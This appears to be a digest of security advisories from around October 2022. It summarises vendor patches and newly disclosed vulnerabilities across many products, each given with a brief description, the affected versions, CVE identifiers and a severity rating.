Multiple vulnerabilities have been discovered in Haas Automation's equipment - Haas
Controller version 100.20.000.1110 that can cause Denial-of-Service (DoS) and Remote Code
Execution (RCE).
CVE ID: CVE-2022-2474, CVE-2022-2475, CVE-2022-41636
VMware has released a security update for Cloud Foundation to address a Remote Code
Execution (RCE) vulnerability and an XML External Entity (XXE) vulnerability. The updates
are available.
CVE ID: CVE-2021-39144, CVE-2022-31678
Dell has released a security update for the PowerStore Family to address multiple
vulnerabilities that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-24903, CVE-2022-1586, CVE-2021-3580
A URL parsing vulnerability has been discovered in the Zoom Client for Meetings for Android,
iOS, Linux, macOS, and Windows.
CVE ID: CVE-2022-28763 (High)
An arbitrary file upload vulnerability has been discovered on
github.com/flipped-aurora/gin-vue-admin versions prior to 2.5.4 caused by path traversal.
This issue is patched in 2.5.4b. There are no known workarounds.
CVE ID: CVE-2022-39305 (Critical)
Session fixation and insufficient session expiration vulnerabilities have been discovered in
Lanner Inc IAC-AST2500A standard firmware version 1.10.0. These vulnerabilities allow an
attacker to perform session hijacking attacks against users.
CVE ID: CVE-2021-46279 (Critical)
Command injection and multiple stack-based buffer overflow vulnerabilities have been
discovered in Lanner Inc IAC-AST2500A standard firmware version 1.10.0. These vulnerabilities
allow an attacker to execute arbitrary code with the same privileges as the server user
(root).
CVE ID: CVE-2021-26731 (Critical)
A stack-based buffer overflow vulnerability has been discovered in Lanner Inc IAC-AST2500A
standard firmware version 1.10.0. This vulnerability allows an attacker to execute arbitrary
code with the same privileges as the server user (root).
CVE ID: CVE-2021-26730 (Critical)
An authentication bypass vulnerability has been discovered in Dell PowerStore versions
2.1.0.x. A remote unauthenticated attacker could potentially exploit this vulnerability
under specific configurations.
CVE ID: CVE-2022-26870 (Critical)
A vulnerability has been discovered in Exim. This issue affects the function
dmarc_dns_lookup of the file dmarc.c of the component DMARC Handler. A patch has been issued
to fix this vulnerability.
CVE ID: CVE-2022-3620
A Missing Authentication for Critical Function vulnerability has been discovered in the GitHub
repository ikus060/rdiffweb prior to 2.5.0a6.
CVE ID: CVE-2022-3327 (Critical)
A sandbox bypass vulnerability has been discovered in Jenkins Pipeline: Deprecated Groovy
Libraries Plugin 583.vf3b_454e43966 and earlier. This vulnerability allows attackers to
bypass the sandbox protection and execute arbitrary code in the context of the Jenkins
controller JVM.
CVE ID: CVE-2022-43406 (Critical)
An authentication bypass vulnerability has been discovered in the device password generation
functionality of Swift Sensors Gateway SG3-1010. A specially-crafted network request can
lead to Remote Code Execution (RCE). An attacker can send a sequence of requests to trigger
this vulnerability.
CVE ID: CVE-2021-40422 (Critical)
Apache has released a security update to resolve a CRLF log injection vulnerability in Apache
Heron versions <= 0.20.4-incubating.
CVE ID: CVE-2021-42010 (Low)
The cybercrime group "Daixin Team" is predominantly targeting the Healthcare and Public
Health (HPH) Sector with ransomware and data extortion operations.
An authentication bypass vulnerability has been discovered in Siveillance Video Mobile
Server V2022 R2 (All versions < V22.2a (80)). This vulnerability can allow an
unauthenticated remote attacker to access the application without a valid account.
CVE ID: CVE-2022-43400 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in OpenCATS via the
getDataGridPager's ajax functionality. The affected version is OpenCATS v0.9.6.
CVE ID: CVE-2022-43019 (Critical)
Bentley Systems has released a security update to address stack-based buffer overflow and
out-of-bounds read vulnerabilities in Bentley Systems' Equipment- MicroStation Connect which
can crash the device being accessed or allow remote arbitrary code execution. The affected
products are Bentley Systems MicroStation Connect v10.17.0.209 and prior.
CVE ID: CVE-2022-40201 (High), CVE-2022-41613 (High)
B. Braun Melsungen AG has released security updates to address multiple vulnerabilities in
B. Braun Melsungen AG's Equipment- SpaceCom, Battery Pack SP with Wi-Fi, and Data module
compactplus. The affected products are SpaceCom software versions U61 and earlier and L81 and
earlier; Battery Pack with Wi-Fi software versions U61 and earlier and L81 and earlier;
and Data module compactplus software versions A10 and A11.
CVE ID: CVE-2020-25158 (High), CVE-2020-25154 (Medium), CVE-2020-25162 (High),
CVE-2020-25152 (Medium), CVE-2020-25164 (Medium), CVE-2020-25150 (High), CVE-2020-25166
(Medium), CVE-2020-16238 (Medium), CVE-2020-25168 (Low), CVE-2020-25156 (High),
CVE-2020-25160 (Medium)
Google has released Beta channel 107.0.5304.51 (Platform version: 15117.66.0 / 15117.67.0)
for most ChromeOS devices, Chrome Beta 107 (107.0.5304.54) for Android, and Beta channel has
been updated to 107.0.5304.62 for Windows, Mac & Linux.
HP has released security updates to resolve a vulnerability in the system BIOS for HP PC
products, which can allow loss of integrity.
CVE ID: CVE-2022-31643 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A command injection vulnerability has been discovered in D-Link DIR878 via the component
/bin/proc.cgi. The affected version is D-Link DIR878 1.30B08 Hotfix_04.
CVE ID: CVE-2022-43184 (Critical)
A stack overflow vulnerability has been discovered in Acer Altos that allows an attacker to
cause a Denial of Service (DoS) by injecting crafted shellcode into the NVRAM variable. The
affected version is Acer Altos W2000h-W570h F4 R01.03.0018.
CVE ID: CVE-2022-41415 (Critical)
A deserialization vulnerability has been discovered in dubbo hessian-lite which can lead to
malicious code execution. The affected versions are dubbo hessian-lite 3.2.12 and below.
CVE ID: CVE-2022-39198 (Critical)
An improper input validation vulnerability has been discovered in the J-Web component of
Juniper Networks Junos OS that allows an attacker to access data without proper authorisation. The
affected versions are Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2
versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to
19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5;
20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to
21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4
versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
CVE ID: CVE-2022-22241 (Critical)
A Server Side Request Forgery (SSRF) vulnerability has been discovered in kkFileView via
controller\OnlinePreviewController.java. The affected version is kkFileView 4.0.
CVE ID: CVE-2022-42149 (Critical)
A vulnerability has been discovered in GPON ONT Titanium that allows an attacker to escalate
privileges via a brute-force attack at the login page. The affected version is GPON ONT
Titanium 2122A T2122-V1.26EXL.
CVE ID: CVE-2022-40055 (Critical)
B. Braun Melsungen AG has released security updates to address multiple vulnerabilities in
B. Braun Melsungen AG's Equipment- Infusomat Space Large Volume Pump.
CVE ID: CVE-2021-33886 (Medium), CVE-2021-33885 (Critical), CVE-2021-33882 (Medium),
CVE-2021-33883 (Medium), CVE-2021-33884 (Medium)
A remote code execution vulnerability due to insufficient user privilege verification has
been discovered in reverseWall-MDS. Remote attackers can exploit this vulnerability, for
example to steal accounts, through remote code execution.
CVE ID: CVE-2022-23769 (Critical)
A path traversal vulnerability has been discovered in Tableau Server Administration Agent's
internal file transfer service that allows remote code execution.
CVE ID: CVE-2022-22128 (Critical)
A double-free vulnerability has been discovered in contrib/shpsort.c of shapelib that allows
an attacker to cause a denial of service or have other unspecified impact via control over
malloc. The affected versions are shapelib 1.5.0 and older releases.
CVE ID: CVE-2022-0699 (Critical)
A SQL Injection vulnerability has been discovered in Merchandise Online Store that allows an
attacker to log in to the admin account. The affected version is Merchandise Online Store
v.1.0.
CVE ID: CVE-2022-42237 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20933 (High), CVE-2022-20822 (High), CVE-2022-20917 (Medium),
CVE-2022-20959 (Medium), CVE-2022-20776 (Medium), CVE-2022-20811 (Medium), CVE-2022-20953
(Medium), CVE-2022-20954 (Medium), CVE-2022-20955 (Medium)
Google has released Chrome Dev 108 (108.0.5359.10) for Android, Dev channel 108.0.5359.10
for Windows, Mac and Linux, and Stable channel 106.0.5249.134 (Platform version:
15054.114.0/15054.115.0) for most ChromeOS devices.
VMware has released a security update to address a vulnerability in Reactor Netty HTTP
Server. The affected versions are Reactor Netty 1.0.11 to 1.0.23.
CVE ID: CVE-2022-31684 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Oracle has released its critical patch updates for October 2022 to address 370
vulnerabilities across multiple products. An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2022-23305 (Critical), CVE-2022-21587 (Critical), CVE-2022-39428
(Critical), CVE-2022-25315 (Critical), CVE-2022-32532 (Critical), CVE-2022-23457 (Critical),
CVE-2022-23943 (Critical), CVE-2022-33980 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in GetSimple CMS. The
affected version is GetSimple CMS v3.3.16.
CVE ID: CVE-2022-41544 (Critical)
An insufficient validation vulnerability has been discovered in the RAVA certificate
validation system. An unauthenticated remote attacker can inject arbitrary SQL commands to
access, modify and delete the database.
CVE ID: CVE-2022-39056 (Critical)
An out-of-bounds write vulnerability has been discovered in the MPTCP module. Successful
exploitation of this vulnerability can cause root privilege escalation attacks implemented
by modifying program information.
CVE ID: CVE-2022-41578 (Critical)
It has been discovered that the HIPP module has a vulnerability of bypassing the check of
the data transferred in the kernel space. Successful exploitation of this vulnerability can
cause out-of-bounds access to the HIPP module and page table tampering, affecting device
confidentiality and availability.
CVE ID: CVE-2022-38986 (Critical)
A Use-After-Free (UAF) vulnerability has been discovered in the BT Hfp Client module.
Successful exploitation of this vulnerability can result in arbitrary code execution.
CVE ID: CVE-2022-38983 (Critical)
A prototype pollution vulnerability has been discovered in the function copy in dom.js in
the xmldom package for Node.js. The affected versions are dom.js in the xmldom package before
0.8.3.
CVE ID: CVE-2022-37616 (Critical)
Advantech has released security updates to address path traversal and stack-based buffer
overflow vulnerabilities in Advantech's equipment- R-SeeNet. Successful exploitation of
these vulnerabilities can result in an unauthorized attacker remotely deleting files on the
system or allowing remote code execution.
CVE ID: CVE-2022-3387 (Medium), CVE-2022-3386 (Critical), CVE-2022-3385
(Critical)
Debian has released security updates to resolve several vulnerabilities in node-xmldom, and
bcel. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-37616 (Critical), CVE-2022-34169 (High)
Yokogawa has released security updates to address a stack-based buffer overflow
vulnerability in Yokogawa application software WTViewerE. The affected products are
WTViewerE 761941 versions 1.31 to 1.61, and WTViewerEfree versions 1.01 to 1.52.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.4 and Firefox 106. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-42927 (High), CVE-2022-42928 (High), CVE-2022-42929 (Medium),
CVE-2022-42930 (Medium), CVE-2022-42931 (Low), CVE-2022-42932 (Medium)
Adobe has released security updates to address improper input validation and out-of-bounds
read vulnerabilities in Adobe Illustrator. The affected products are Illustrator 2022
26.4 and earlier, and Illustrator 2021 25.4.7 and earlier.
CVE ID: CVE-2022-38435 (High), CVE-2022-38436 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Juniper Networks has released security updates to address an improper handling of an
unexpected data type vulnerability in Junos OS and Junos OS Evolved. The affected products
are Junos OS 21.3, 21.4, 22.1, 22.2, and Junos OS Evolved 21.3-EVO, 21.4-EVO, 22.1-EVO,
22.2-EVO.
CVE ID: CVE-2022-22219 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
An unrestricted file upload vulnerability has been discovered in Gin-Vue-Admin. The affected
versions are Gin-Vue-Admin v2.5.1 through v2.5.3b.
CVE ID: CVE-2022-32176 (Critical)
Debian has released a security update to address an integer overflow vulnerability in the
libksba package, which can result in Denial of Service (DoS) or the execution of arbitrary
code.
CVE ID: CVE-2022-3515
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that multiple Trumpf products use default privileged Windows users
and passwords. An adversary could use these accounts to remotely gain full access to the
system.
CVE ID: CVE-2022-2052 (Critical)
Ree6 has released a security update to address a SQL injection vulnerability in Ree6. The
affected versions are Ree6 prior to 1.7.0.
CVE ID: CVE-2022-39303 (Critical)
Apache has released a security update to address a vulnerability in Apache Commons Text when
it performs variable interpolation. The affected versions are Apache Commons Text 1.5
through 1.9.
CVE ID: CVE-2022-42889 (Critical)
A code injection vulnerability has been discovered in Spring Cloud Gateway. The affected
versions are Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+.
CVE ID: CVE-2022-22947 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel
(Azure), and zlib. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-37434, CVE-2022-33741 (High), CVE-2022-32296 (Low), CVE-2022-1012
(Critical), CVE-2022-33740 (High), CVE-2022-33744 (Medium), CVE-2022-33742 (High),
CVE-2022-0812 (Medium), CVE-2022-2318 (Medium), CVE-2022-26365 (High)
A SQL injection vulnerability has been discovered in Django. The affected versions are
Django 3.2 before 3.2.14, and Django 4.0 before 4.0.6.
CVE ID: CVE-2022-34265 (Critical)
An improper limitation of a pathname to a Restricted Directory ('Path Traversal')
vulnerability has been discovered in Adobe ColdFusion. The affected versions are Adobe
ColdFusion Update 14 and earlier, and Adobe ColdFusion Update 4 and earlier.
CVE ID: CVE-2022-38418 (Critical)
A SQL injection vulnerability has been discovered in Online Diagnostic Lab Management
System. The affected version is Online Diagnostic Lab Management System version 1.0.
CVE ID: CVE-2022-42064 (Critical)
A double free vulnerability has been discovered in the storage module. Successful
exploitation of this vulnerability will cause the memory to be freed twice.
CVE ID: CVE-2022-39002 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Denial of Service (DoS) vulnerabilities that an unauthenticated attacker can trigger have been
discovered in Ivanti products. The affected products are Ivanti Connect Secure (ICS)
versions prior to 9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS)
versions prior to 9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Gateway versions
prior to 22.3R1.
CVE ID: CVE-2022-35254 (High), CVE-2022-35258 (High)
Dell has released security updates to address OS command injection, privilege context
switching error, and allocation of resources without limits or throttling vulnerabilities in
Dell EMC PowerScale OneFS. The affected versions are Dell PowerScale OneFS 8.2.2 to 9.3.0,
8.2.x to 9.4.0.x, and 8.2.0.x to 9.4.0.x.
CVE ID: CVE-2022-34437 (Medium), CVE-2022-34438 (Medium), CVE-2022-34439
(Medium)
SonicWall has released security updates to address a file path manipulation vulnerability
in SonicWall GMS. The affected versions are SonicWall GMS prior to 9.3.2.
CVE ID: CVE-2021-20030 (Medium)
An unauthenticated command injection vulnerability has been discovered in ArrayOS AG of
Array Networks AG/vxAG. The affected versions are ArrayOS AG prior to 9.4.0.469.
CVE ID: CVE-2022-42897 (Critical)
MelisFront has released a security update to address a deserialization of arbitrary data
vulnerability in melisplatform/melis-front. The affected versions are
melisplatform/melis-front prior to 5.0.1.
CVE ID: CVE-2022-39298 (Critical)
MelisCms has released a security update to address a deserialization of arbitrary data
vulnerability in melisplatform/melis-cms. The affected versions are melisplatform/melis-cms
prior to 5.0.1.
CVE ID: CVE-2022-39297 (Critical)
A prototype pollution vulnerability has been discovered in the parseQuery function of
parseQuery.js for webpack loader-utils. The affected version is webpack loader-utils 2.0.0.
CVE ID: CVE-2022-37601 (Critical)
An authentication bypass vulnerability has been discovered in Apache Shiro when forwarding
or including via RequestDispatcher. The affected versions are Apache Shiro before 1.10.0.
CVE ID: CVE-2022-40664 (Critical)
A command injection vulnerability has been discovered in the git package. The affected
versions are git package before 1.11.0.
CVE ID: CVE-2022-25648 (Critical)
Mitsubishi Electric has released security updates to address multiple vulnerabilities in its
Equipment- MELSEC iQ-R Series.
CVE ID: CVE-2021-20599 (Critical), CVE-2021-20597 (High), CVE-2021-20594
(Medium)
Palo Alto Networks has released a security update to address an authentication bypass
vulnerability in the Palo Alto Networks PAN-OS 8.1 web interface.
CVE ID: CVE-2022-0030
Drupal has released a security update to resolve an access bypass vulnerability in Twig Field
Value, a third-party library used by Drupal that does not sufficiently apply access
restrictions when using the filters field_label, field_value, field_raw and
field_target_entity. The affected versions are Twig Field Value module 8.x-1.x and 2.0.x.
Juniper Networks has released security updates to address multiple vulnerabilities affecting
its products. An attacker can exploit some of these vulnerabilities to take control of an
affected system.
A memory corruption vulnerability has been discovered in SAP SQL Anywhere, and SAP IQ. The
affected versions are SAP SQL Anywhere 17.0, and SAP IQ 16.1.
CVE ID: CVE-2022-35299 (Critical)
vm2 has released a security update to address a vulnerability that allows a threat actor to
bypass sandbox protections to gain Remote Code Execution (RCE) rights on the host running
the sandbox. The affected versions are vm2 prior to 3.9.11.
CVE ID: CVE-2022-36067 (Critical)
A weak key protection vulnerability has been discovered in Siemens SIMATIC S7-1200, S7-1500
CPU Families. Successful exploitation can allow native code execution to extract heavily
guarded, hardcoded, global private cryptographic keys embedded within the Siemens SIMATIC
S7-1200/1500 PLC and TIA Portal product lines.
CVE ID: CVE-2022-38465 (Critical)
Multiple vulnerabilities have been discovered in Zoom Client for Meetings for macOS, and
Zoom On-Prem Deployments. The affected versions are Zoom Client for Meetings for macOS
(Standard and for IT Admin) 5.10.6 and prior to 5.12.0, and Zoom On-Premise Meeting
Connector MMR before version 4.8.20220916.131.
CVE ID: CVE-2022-28762 (High), CVE-2022-28761 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Lenovo has released security updates to address IPv6 VLAN stacking vulnerabilities in its
network security controls that can be exploited by sending crafted network packets to bypass
their inspection and filtering capabilities. The affected product is Broadcom - BES 53248
Networking Switch.
CVE ID: CVE-2021-27853 (Medium), CVE-2021-27854 (Medium), CVE-2021-27861 (Medium),
CVE-2021-27862 (Medium)
LibreOffice has released security updates to address a macro URL arbitrary script execution
vulnerability in its products. The affected versions are LibreOffice 7.3.6 to 7.4.1.
CVE ID: CVE-2022-3140
Trellix has released a security update to address multiple vulnerabilities in ePolicy
Orchestrator. The affected versions are ePolicy Orchestrator (ePO) 5.10 prior to update 14.
CVE ID: CVE-2022-3338 (Medium), CVE-2022-3339 (Medium)
Sensormatic Electronics has released security updates to address a vulnerability in its
C-CURE 9000 equipment. The affected versions are C-CURE 9000 2.90 and earlier.
CVE ID: CVE-2021-36201 (Medium)
Multiple vulnerabilities have been discovered in Altair's Equipment- HyperView Player.
Successful exploitation of these vulnerabilities can crash the device accessed. The affected
products are HyperView Player versions 2021.1.0.27 and prior.
CVE ID: CVE-2022-2947 (High), CVE-2022-2949 (High), CVE-2022-2950 (High),
CVE-2022-2951 (High)
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address a vulnerability in .NET 6 that can cause
execution of arbitrary code. The affected product is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-41032 (High)
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor 8.2 LTSR CU1. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-33748, CVE-2022-33749
VMware has released a security update to address an arbitrary file read vulnerability in
Aria Operations. A malicious actor with administrative privileges can read arbitrary files
containing sensitive data.
CVE ID: CVE-2022-31682 (Medium)
Debian has released security updates to resolve several vulnerabilities in Twig, and
isc-dhcp. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39261 (High), CVE-2022-2928 (Medium), CVE-2022-2929
(Medium)
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Phoenix Contact has released security updates to address multiple vulnerabilities in PLCnext
Firmware. Availability, integrity, or confidentiality of the PLCnext Control can be
compromised by attacks using these vulnerabilities.
CVE ID: CVE-2022-32207 (Critical), CVE-2022-2207 (Critical), CVE-2022-1927
(Critical), CVE-2022-0547 (Critical), CVE-2022-25235 (Critical), CVE-2022-25236 (Critical),
CVE-2022-2210 (Critical)
Microsoft has released security updates to address an elevation of privilege vulnerability
in several versions of Azure Arc-enabled Kubernetes cluster that can allow an
unauthenticated user to elevate their privileges and potentially gain administrative control
over the Kubernetes cluster.
CVE ID: CVE-2022-37968 (Critical)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in Gogs that could lead
to an account takeover. The affected versions are Gogs v0.6.5 through v0.12.10.
CVE ID: CVE-2022-32174 (Critical)
It has been discovered that an integer conversion error vulnerability in Hermes bytecode
generation, prior to commit 6aa825e480d48127b480b08d13adf70033237097, can be used to perform
out of bounds operations and subsequently execute arbitrary code.
CVE ID: CVE-2022-40138 (Critical)
An integer overflow vulnerability has been discovered in Hermes, prior to commit
5b6255ae049fa4641791e47fad994e8e8c4da374, that allows an attacker to execute arbitrary code
via crafted JavaScript.
CVE ID: CVE-2022-35289 (Critical)
A forced browsing vulnerability has been discovered in Trend Micro Apex One that allows an
attacker with access to the Apex One console on affected installations to escalate
privileges and modify certain agent groupings.
CVE ID: CVE-2022-41746 (Critical)
Aruba has released security updates to address two unauthenticated buffer overflow
vulnerabilities in the Aruba InstantOS and ArubaOS 10 web management interface. The affected
versions are Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x:
6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x:
8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and
below.
CVE ID: CVE-2022-37891 (Critical), CVE-2022-37890 (Critical)
Aruba has released security updates to address a buffer overflow vulnerability in the Aruba
PAPI protocol (Aruba Networks AP management protocol). The affected versions are Aruba InstantOS
6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba
InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba
InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below.
CVE ID: CVE-2022-37889 (Critical)
A command injection vulnerability has been discovered in TOTOLINK NR1800X. The affected
version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41525 (Critical)
An unauthenticated stack overflow vulnerability via the "main" function has been discovered
in TOTOLINK NR1800X. The affected version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41522 (Critical)
A command injection vulnerability via the UploadFirmwareFile function has been discovered in
TOTOLINK NR1800X. The affected version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41518 (Critical)
Daikin Holdings Singapore Pte Ltd. has released security updates to address use of
hard-coded password and improper access control vulnerabilities in its SVMPC1 and SVMPC2
equipment. Successful exploitation of these vulnerabilities can disclose sensitive
information on the affected devices and give an attacker full control of the system. The
affected products are SVMPC1: Version 2.1.22 and prior, and SVMPC2: Version 1.2.3 and prior.
CVE ID: CVE-2022-41653 (Critical), CVE-2022-38355 (High)
Adobe has released security updates to address multiple critical vulnerabilities in Adobe
ColdFusion, Adobe Acrobat Reader, Adobe Commerce, and Adobe Dimension. An attacker can
exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-35710 (Critical), CVE-2022-35711 (Critical),
CVE-2022-35690 (Critical), CVE-2022-35712 (Critical), CVE-2022-35698 (Critical)
Fortinet has released security updates to address an authentication bypass vulnerability in
the administrative interface of FortiOS, FortiProxy and FortiSwitchManager, which can allow
an unauthenticated attacker to perform operations on the administrative interface via
specially crafted HTTP or HTTPS requests.
CVE ID: CVE-2022-40684 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address a brute-force vulnerability in Dell EMC XtremIO
which can be exploited to gain access to an admin account. The affected versions are Dell
EMC XtremIO versions prior to X2 6.4.0-22.
CVE ID: CVE-2022-31228 (High)
Apple has released iOS 16.0.3 and watchOS 9.0.2 to resolve vulnerabilities in those
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-22658
A SQL injection vulnerability has been discovered in Sourcecodester Simple E-Learning
System. The affected version is Sourcecodester Simple E-Learning System 1.0.
CVE ID: CVE-2022-40872 (Critical)
A SQL injection vulnerability has been discovered in B.C. Institute of Technology
CodeIgniter. The affected versions are B.C. Institute of Technology CodeIgniter 3.1.13 and
below.
CVE ID: CVE-2022-40835 (Critical)
Trend Micro has released a security update to address information disclosure and privilege
escalation vulnerabilities in Trend Micro Deep Security and Cloud One - Workload Security
agents for Windows. The affected products are Deep Security Agent Version 20, and Cloud One
- Workload Security Agent Version 20.
GROWI has released a security update to address an improper access control vulnerability in
its products. The affected products are GROWI versions prior to v5.1.4 (v5 series), and
GROWI versions prior to v4.5.25 (v4 series).
CVE ID: CVE-2022-41799 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
VMware has released security updates to address unsafe deserialisation and null-pointer
dereference vulnerabilities in VMware vCenter Server and VMware ESXi respectively.
CVE ID: CVE-2022-31680 (High), CVE-2022-31681 (Low)
It has been discovered that cyber actors continue to target government and critical
infrastructure networks with an increasing array of new and adaptive techniques—some of
which pose a significant risk to Information Technology (IT) Sector organisations (including
telecommunications providers), Defense Industrial Base (DIB) Sector organisations, and other
critical infrastructure organisations.
Rockwell Automation has released security updates to address improper access control and
SQL injection vulnerabilities in FactoryTalk VantagePoint software, which can allow Remote
Code Execution (RCE). The affected versions are FactoryTalk VantagePoint 8.0 to 8.31.
CVE ID: CVE-2022-38743 (Critical), CVE-2022-3158 (Critical)
An improper access control vulnerability has been discovered in HIWIN Robot System Software
(HRSS) that can cause a Denial of Service (DoS) condition.
CVE ID: CVE-2022-3382 (High)
Ubuntu has released security updates to address several vulnerabilities in LibreOffice and
Linux kernel. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-26307 (High), CVE-2022-26306 (High), CVE-2022-26305 (High),
CVE-2022-36946 (High), CVE-2022-2503 (Medium), CVE-2022-32296 (Low), CVE-2021-33655
(Medium), CVE-2022-1012 (High), CVE-2022-1729 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An authentication bypass vulnerability has been discovered in the NETGEAR WNAP210v2 wireless
access point. NETGEAR will not release a fix for this vulnerability because the affected
product is outside its security support period.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2928 (Medium), CVE-2022-2929 (Medium), CVE-2022-42010,
CVE-2022-42011, CVE-2022-42012, CVE-2022-40617 (Medium)
An out-of-bounds read vulnerability has been discovered in the PCRE2 library that affects
the recursions in JIT-compiled regular expressions caused by duplicate data transfers.
CVE ID: CVE-2022-1587 (Critical)
NVIDIA has released a security update for NVIDIA CUDA Toolkit software to address a
stack-based buffer overflow vulnerability that can lead to code execution, denial of
service, or information disclosure. The affected versions are NVIDIA CUDA Toolkit all
versions prior to 11.8 for Linux and Windows.
CVE ID: CVE-2022-34667 (Medium)
Omron has released security updates to address multiple out-of-bounds write vulnerabilities
in its equipment- CX-Programmer that can crash the device or allow arbitrary code execution.
CVE ID: CVE-2022-3398 (High), CVE-2022-3396 (High), CVE-2022-3397 (High)
Horner Automation has released security updates to address out-of-bounds write, and access
of uninitialized pointer vulnerabilities in its equipment- Cscape which can cause arbitrary
code execution.
CVE ID: CVE-2022-3379 (High), CVE-2022-3378 (High), CVE-2022-3377 (High)
Multiple vulnerabilities, including Cross-Site Request Forgery (CSRF) and HTTP response
splitting, have been discovered in Hitachi Energy's Modular Switchgear Monitoring (MSM)
equipment. Successful exploitation of these vulnerabilities can allow an attacker to inject
malicious commands or trick a valid user into downloading malicious software onto their
computer.
CVE ID: CVE-2021-40335 (Medium), CVE-2021-40336 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20929 (High), CVE-2022-20814 (High), CVE-2022-20853 (High),
CVE-2021-27853 (Medium), CVE-2021-27854 (Medium), CVE-2021-27861 (Medium), CVE-2021-27862
(Medium)
A vulnerability has been discovered in Autodesk Desktop App (ADA) that can allow an attacker
to escalate privileges and execute arbitrary code.
CVE ID: CVE-2022-33882 (Critical)
A SQL Injection vulnerability has been discovered in Veritas NetBackup and related Veritas
products. The affected versions are Veritas NetBackup through 10.0.
